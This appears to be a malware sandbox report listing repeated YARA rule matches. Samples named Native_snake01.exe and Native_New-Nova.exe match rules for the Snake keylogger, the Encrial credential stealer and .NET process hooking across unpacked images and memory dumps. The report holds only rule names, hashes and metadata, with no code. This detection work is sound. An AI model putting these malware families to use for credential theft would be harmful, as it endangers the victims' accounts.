Source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
